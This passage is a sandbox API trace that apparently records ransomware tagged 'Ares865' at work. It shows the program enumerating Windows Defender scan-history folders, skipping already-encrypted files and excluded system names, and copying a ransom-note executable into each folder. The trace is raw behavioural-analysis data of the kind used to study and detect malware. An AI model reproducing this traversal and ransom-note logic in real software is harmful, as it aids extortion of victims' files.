ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63750dc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.570] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.571] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.571] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.571] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63750dc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.571] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.571] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.571] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.571] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.571] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb9820270, ftCreationTime.dwHighDateTime=0x1d2faf0, ftLastAccessTime.dwLowDateTime=0xb9820270, ftLastAccessTime.dwHighDateTime=0x1d2faf0, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x310, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History.Log.Ares865", cAlternateFileName="HISTOR~1.ARE")) returned 1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="aoldtz.exe") returned 1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2=".") returned 1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="..") returned 1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="windows") returned -1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="bootmgr") returned 1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="temp") returned -1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="pagefile.sys") returned -1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="boot") returned 1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="ids.txt") returned -1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="ntuser.dat") returned -1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="perflogs") returned -1 [0090.571] lstrcmpiW (lpString1="History.Log.Ares865", lpString2="MSBuild") returned -1 [0090.571] lstrlenW (lpString="History.Log.Ares865") returned 19 [0090.571] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned 103 [0090.571] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="History.Log.Ares865" | out: lpString1="History.Log.Ares865") returned="History.Log.Ares865" [0090.571] lstrlenW (lpString="History.Log.Ares865") returned 19 [0090.571] lstrlenW (lpString="Ares865") returned 7 [0090.571] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.571] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.571] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.571] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xadeed740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xadeed740, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1d90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Unknown.Log.Ares865", cAlternateFileName="UNKNOW~1.ARE")) returned 1 [0090.571] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.571] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="aoldtz.exe") returned 1 [0090.571] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2=".") returned 1 [0090.571] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="..") returned 1 [0090.571] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="windows") returned -1 [0090.571] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="bootmgr") returned 1 [0090.571] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="temp") returned 1 [0090.572] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="pagefile.sys") returned 1 [0090.572] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="boot") returned 1 [0090.572] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="ids.txt") returned 1 [0090.572] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="ntuser.dat") returned 1 [0090.572] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="perflogs") returned 1 [0090.572] lstrcmpiW (lpString1="Unknown.Log.Ares865", lpString2="MSBuild") returned 1 [0090.572] lstrlenW (lpString="Unknown.Log.Ares865") returned 19 [0090.572] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service\\History.Log.Ares865") returned 121 [0090.572] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="Unknown.Log.Ares865" | out: lpString1="Unknown.Log.Ares865") returned="Unknown.Log.Ares865" [0090.572] lstrlenW (lpString="Unknown.Log.Ares865") returned 19 [0090.572] lstrlenW (lpString="Ares865") returned 7 [0090.572] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.572] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xadeed740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xadeed740, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1d90, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Unknown.Log.Ares865", cAlternateFileName="UNKNOW~1.ARE")) returned 0 [0090.572] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.572] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0090.572] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0090.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0090.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0090.572] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 101 [0090.572] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results" [0090.572] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.572] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\scans\\history\\results\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.573] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.573] GetLastError () returned 0x0 [0090.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.573] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.573] CloseHandle (hObject=0x120) returned 1 [0090.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.573] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.573] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.573] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.573] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.573] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.573] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.573] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.573] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.573] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.573] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.573] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.573] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="aoldtz.exe") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2=".") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="..") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="windows") returned -1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="bootmgr") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="temp") returned -1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="pagefile.sys") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="boot") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="ids.txt") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="ntuser.dat") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="perflogs") returned 1 [0090.574] lstrcmpiW (lpString1="Resource", lpString2="MSBuild") returned 1 [0090.574] lstrlenW (lpString="Resource") returned 8 [0090.574] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\*") returned 103 [0090.574] lstrcpyW (in: lpString1=0x2cce4cc, lpString2="Resource" | out: lpString1="Resource") returned="Resource" [0090.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0090.574] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xde) returned 0x2f4fc8 [0090.574] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d2248 [0090.574] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resource", cAlternateFileName="")) returned 0 [0090.574] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.574] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0090.574] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" [0090.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0090.574] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0090.574] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned 110 [0090.574] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource" [0090.574] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.574] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\scans\\history\\results\\resource\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.575] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.575] GetLastError () returned 0x0 [0090.575] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.575] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.575] CloseHandle (hObject=0x120) returned 1 [0090.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.575] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.575] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.575] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.575] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.575] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.576] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa13d69d0, ftCreationTime.dwHighDateTime=0x1d2dda3, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.576] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.576] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.576] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.576] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.576] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.576] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.576] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80be8ad0, ftCreationTime.dwHighDateTime=0x1d33740, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", cAlternateFileName="{1D1DB~1.ARE")) returned 1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="aoldtz.exe") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2=".") returned 1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="..") returned 1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="windows") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="bootmgr") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="temp") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="pagefile.sys") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="boot") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="ids.txt") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="ntuser.dat") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="perflogs") returned -1 [0090.576] lstrcmpiW (lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", lpString2="MSBuild") returned -1 [0090.576] lstrlenW (lpString="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865") returned 46 [0090.576] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\*") returned 112 [0090.576] lstrcpyW (in: lpString1=0x2cce4de, lpString2="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865" | out: lpString1="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865") returned="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865" [0090.576] lstrlenW (lpString="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865") returned 46 [0090.576] lstrlenW (lpString="Ares865") returned 7 [0090.576] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.576] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80be8ad0, ftCreationTime.dwHighDateTime=0x1d33740, ftLastAccessTime.dwLowDateTime=0x80be8ad0, ftLastAccessTime.dwHighDateTime=0x1d33740, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{1D1DBF3A-752F-47E2-BE70-D848D4A9AFB0}.Ares865", cAlternateFileName="{1D1DB~1.ARE")) returned 0 [0090.576] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.576] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0090.576] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0090.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0090.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0090.576] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 106 [0090.576] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0090.577] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.577] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\scans\\history\\cachemanager\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.577] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 